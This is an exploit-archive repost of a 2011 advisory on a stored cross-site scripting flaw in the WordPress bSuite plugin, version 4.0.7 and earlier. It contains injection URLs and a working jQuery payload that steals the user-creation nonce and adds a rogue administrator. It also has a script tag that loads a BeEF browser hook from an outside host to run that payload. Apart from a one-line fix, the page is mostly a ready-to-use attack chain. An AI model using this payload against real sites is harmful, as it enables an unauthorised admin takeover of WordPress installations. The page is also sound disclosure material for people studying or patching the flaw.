Home / exploitsPDF  

WordPress bSuite 4.0.7 Cross Site Scripting

Posted on 19 July 2011

Original advisory:
http://www.ihteam.net/advisory/bsuite-wordpress-permanent-xss/

*WordPress bSuite <= 4.0.7 Permanent XSS -> Add Admin*
*Download link:* http://wordpress.org/extend/plugins/bsuite/
*Author contact:* 29/06/2011
*POC published:* 11/07/2011
Plugin is out-of-date, last update on 2009, so this is just a POC that
show how
to made the XSS more useful

*FIX:* Add htmlspecialchars to output

*Bug found by:* IHTeam
Simone `R00T_ATI` Quatrini
Marco `white_sheep` Rondini
Francesco `merlok` Morucci
Mauro `epicfail` Gasperini

*Follow us on Twitter! @IHTeam <http://twitter.com/IHTeam>*

*CHECK BSUITE:*

http://192.168.1.100/wordpress/plugins/bsuite/js/bsuite.js

*PERMANENT XSS POC:*
You can inject XSS in different way, for example:

http://192.168.1.100/wordpress/?s=<h2>XSSED</h2>

or directly in URL:

http://192.168.1.100/wordpress/?p=1&<h1>XSSED</h1>

Now, when admin enter in bSuite panel, will see the XSSED code

<http://www.ihteam.net/wp-content/uploads/bsuite_XSSED.jpeg>

*XSS TO REMOTE ADMIN ADD:
*We will use beef <http://beefproject.com/>to do that part. So:

1. Run beef on you local machine
2. Enable auto-run that code:

jQuery(“<div>”, {
id: “testbeef”
}).appendTo(“#screen-meta-links”);
jQuery.get(“user-new.php”, function(data) {
jQuery(“#testbeef”).html(data);
var nonce=jQuery(“#_wpnonce_create-user”).val();
jQuery(“#testbeef”).html(“”);

jQuery.post(“user-new.php”, {
“_wp_http_referer”: “/wordpress/wp-admin/user-new.php”,
“_wpnonce_create-user”: nonce,
action: “createuser”,
createuser: “Add New User”,
email: “hax0rmail@mail.com”,
first_name: “”,
last_name: “”,
pass1: “123123hello”,
pass2: “123123hello”,
role: “administrator”,
url: “”,
user_login: “hax0r”
});

});

We make 2 request to //wordpress/wp-admin/user-new.php/ because we need
to grab
/_wpnonce_create-user/ value.

1. First create a new div with ID /testbeef/
2. Request user-new.php and append content to the DIV
3. Grab _wpnonce_create-user value to nonce variable
4. Clean the DIV content;
5. Make a POST request to user-new.php with the correct values

Review the code to change  _wp_http_referer, pass1, pass2 and user_login
of the
POST request.
Now it’s time to inject the beef control script in bSuite like this:

http://192.168.1.100/s=<script
src=”http://192.168.1.102/beef/hook/beefmagic.js.php”></script>

You may wait 1h to 5h for bSuit refresh. It will result in new admin with
username: /haxor/ and password: /123123hello/

 

TOP

Malware :

Exploits :